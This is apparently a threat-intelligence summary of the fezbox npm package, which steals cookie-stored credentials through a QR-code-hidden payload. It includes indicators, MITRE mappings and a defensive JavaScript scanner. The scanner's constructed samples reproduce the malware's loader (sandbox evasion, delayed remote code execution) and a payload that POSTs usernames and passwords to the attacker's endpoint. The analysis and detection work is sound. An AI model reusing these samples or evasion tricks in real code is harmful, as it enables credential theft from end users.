A malicious npm package named fezbox (author npm alias janedu, email janedu0216@gmail[.]com) used multiple obfuscation layers—including a reversed URL, a QR code containing executable JavaScript, and string obfuscation—to steal username and password values from browser cookies and exfiltrate them to https://my-nest-app-production[.]up[.]railway[.]app/users. Socket identified the package as malicious, flagged it in their scanner, and has petitioned npm for removal while the package remains live. #fezbox #janedu #res.cloudinary.com #my-nest-app-production.up.railway.app
Keypoints
- Threat actor published a malicious npm package named fezbox (npm alias janedu; registration email janedu0216@gmail[.]com) that appears to be a utility library but contains hidden malicious behavior.
- The package contains client-side browser code that, after delays and environment checks, fetches and parses a QR code hosted on Cloudinary and executes the code embedded in that QR image.
- The QR-embedded payload reads document.cookie to extract username and password (the latter obfuscated as a reversed string) and POSTs them to https://my-nest-app-production[.]up[.]railway[.]app/users if both are present.
- Multiple obfuscation layers are used: reversed strings, a QR code steganographic payload, and additional string/character obfuscation in the executed JavaScript to evade static analysis.
- Stealth techniques include an environment check (the loader exits if isDevelopment() returns true), probabilistic execution (c.chance(2 / 3) makes it exit early on roughly two of every three loads, so only about one in three proceeds), and a 120-second setTimeout delay before the payload is fetched; together these reduce the chance of the malware firing inside a short-lived sandbox or a developer's test run.
- Socket’s tooling detected the malicious behavior (fezbox flagged as known malware) and their team has requested npm remove the package and suspend the threat actor.
- Socket recommends using dependency-scanning tools (Socket GitHub App, CLI, browser extension, and MCP) to detect such obfuscated or suspicious packages before they enter projects.
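The stealth and obfuscation behaviour listed above can be turned into a quick static triage check. The following is an added example written for this page, not Socket's scanner and not code from the fezbox package: it resolves unicode escapes, reverses every string literal to look for hidden URLs, and flags long setTimeout delays, isDevelopment() gates, chance()-style probabilistic gates, document.cookie reads and fetch POSTs. The two indicator hosts and the Cloudinary URL are taken from the write-up; the sample sources it runs on are constructed to resemble the described loader and payload, and the finding tags, the 60-second threshold and the regexes are choices made for this example.

```javascript
// Added example, not Socket's tooling and not code from the fezbox package:
// static heuristics for the loader/payload behaviour described in the keypoints.
// Node.js, no dependencies. The sample sources below are constructed for the demo.
"use strict";

// Indicators from the write-up; everything else in this file is a heuristic.
const QR_URL = "https://res.cloudinary.com/dhuenbqsq/image/upload/v1755767716/b52c81c176720f07f702218b1bdc7eff_h7f6pn.jpg";
const IOC_HOSTS = ["my-nest-app-production.up.railway.app", "res.cloudinary.com/dhuenbqsq"];

// Resolve \uXXXX and \xXX escapes so document['\u0063\u006F\u006F\u006B\u0069\u0065']
// is seen as document['cookie'] by the patterns below.
function decodeEscapes(src) {
  return src
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Reverse every string literal; keep the ones that become a URL or contain a known host.
function findReversedStrings(src) {
  const hits = [];
  const literal = /(["'`])((?:\\.|(?!\1)[^\\\n])*)\1/g;
  let m;
  while ((m = literal.exec(src)) !== null) {
    const reversed = m[2].split("").reverse().join("");
    if (/^https?:\/\//.test(reversed) || IOC_HOSTS.some((h) => reversed.includes(h))) hits.push(reversed);
  }
  return hits;
}

// Scan one JavaScript source. Returns a sorted list of finding tags; an empty list
// means nothing matched, not that the file is clean.
function scanSource(src) {
  const decoded = decodeEscapes(src);
  const reversed = findReversedStrings(decoded);
  const haystack = decoded + "\n" + reversed.join("\n");
  const findings = new Set();

  for (const host of IOC_HOSTS) if (haystack.includes(host)) findings.add(`ioc-host:${host}`);
  for (const url of reversed) findings.add(`reversed-url:${url}`);

  if (/document\s*(?:\.\s*cookie|\[\s*["'`]cookie["'`]\s*\])/.test(decoded)) findings.add("reads-document-cookie");
  if (/\bisDevelopment\s*\(/.test(decoded)) findings.add("env-check:isDevelopment");
  if (/\.chance\s*\(|Math\.random\s*\(\s*\)/.test(decoded)) findings.add("probabilistic-gate");
  if (/QRCode/i.test(decoded)) findings.add("qr-decode");
  if (/\bfetch\s*\([\s\S]*?["']?method["']?\s*:\s*["']POST["']/.test(decoded)) findings.add("fetch-post");

  // Timer delays of a minute or more, written as a plain number or as N * 1e3 / N * 1000.
  if (/setTimeout\s*\(/.test(decoded)) {
    const delay = /,\s*(\d+(?:\.\d+)?)\s*(?:\*\s*(1e3|1000))?\s*\)/g;
    let m;
    while ((m = delay.exec(decoded)) !== null) {
      const ms = Number(m[1]) * (m[2] ? 1000 : 1);
      if (ms >= 60000) findings.add(`long-delay:${ms}ms`);
    }
  }
  return [...findings].sort();
}

// Constructed samples shaped like the behaviour described above (not the real package).
const reverse = (s) => s.split("").reverse().join("");
const SAMPLE_LOADER = `
setTimeout(async () => {
  if (n.isDevelopment() || c.chance(2 / 3)) return;
  const t = await loader.parseQRCodeFromUrl("${reverse(QR_URL)}");
  loader.executeCode(t);
}, 120 * 1e3);
`;
const SAMPLE_PAYLOAD = String.raw`
const jar = document['\u0063\u006F\u006F\u006B\u0069\u0065'].split('; ');
await fetch('https://my-nest-app-production.up.railway.app/users', {
  'method': 'POST', 'body': JSON.stringify({ 'username': u, 'password': reverse(p) })
});
`;
const SAMPLE_BENIGN = `
export function debounce(fn, ms) { let t; return (...a) => { clearTimeout(t); t = setTimeout(() => fn(...a), ms); }; }
`;

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, src] of Object.entries({ loader: SAMPLE_LOADER, payload: SAMPLE_PAYLOAD, benign: SAMPLE_BENIGN })) {
    console.log(name, scanSource(src));
  }
}
```

Feed scanSource() the contents of any .js file unpacked from a package tarball (for example the result of fs.readFileSync(path, "utf8")). Treat an empty result as "nothing matched" rather than as a clean bill of health: the heuristics are tuned to the patterns reported here, and a different obfuscator or a delay computed at runtime will not trip them.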
MITRE Techniques
- [T1195.002] Supply Chain Compromise – Package published to npm that delivers malicious code as a dependency: “discovered a malicious package, fezbox…the malicious package remains live on npm.”
- [T1059.007] Command and Scripting Interpreter: JavaScript – Malicious behavior is implemented and executed in browser-side JavaScript: “malware is written to run on the browser client side.”
- [T1105] Ingress Tool Transfer – Loader fetches and parses remote content (QR image) and retrieves executable code from a remote URL: “parseQRCodeFromUrl(…).loader.executeCode(t).”
- [T1539] Steal Web Session Cookie – Code reads document.cookie to extract credentials: “it reads a cookie from document.cookie…gets the username and password.”
- [T1567] Exfiltration Over Web Service – Exfiltrates stolen credentials via HTTPS POST to a remote endpoint: "await fetch('https://my-nest-app-production[.]up[.]railway[.]app/users', … JSON.stringify({ 'username':…, 'password':… }))"
- [T1071.001] Application Layer Protocol: Web Protocols – Uses HTTPS POST requests to send data to attacker-controlled endpoint: "await fetch('https://my-nest-app-production…/users', { 'method': 'POST', … })"
- [T1001.002] Data Obfuscation: Steganography – Executes code hidden inside a QR code image as a steganographic carrier: “the payload contained within this QR code…loader.parseQRCodeFromUrl(…).loader.executeCode(t)”
- [T1027] Obfuscated Files or Information – Multiple layers of string and code obfuscation (reversed strings, unicode-escaped property names, minified/obfuscated payload): "reversed string…obfuscated payload…document['\u0063\u006F\u006F\u006B\u0069\u0065']" (the escapes decode to document['cookie'])
- [T1497.003] Virtualization/Sandbox Evasion: Time Based Evasion – Implements a 120-second delay before executing payload to evade short-lived analysis environments: "setTimeout(async () => { … }, 120 * 1e3);"
- [T1497.001] Virtualization/Sandbox Evasion: System Checks – Checks for development or non-production environments and uses probabilistic execution to avoid running in analysis: "if (n.isDevelopment() || c.chance(2 / 3)) return; …"
Indicators of Compromise
- [Malicious Package] npm package name and author – fezbox (npm alias janedu), registration email janedu0216@gmail[.]com
- [C2 / Payload Host] QR image URL on Cloudinary – https://res[.]cloudinary[.]com/dhuenbqsq/image/upload/v1755767716/b52c81c176720f07f702218b1bdc7eff_h7f6pn.jpg
- [Exfiltration Endpoint] Attacker-controlled web endpoint – https://my-nest-app-production[.]up[.]railway[.]app/users
- [Obfuscated Payload] Embedded JavaScript inside QR code – contains document.cookie access and POST of credentials (examples shown in article), and additional obfuscation like reversed strings and unicode escapes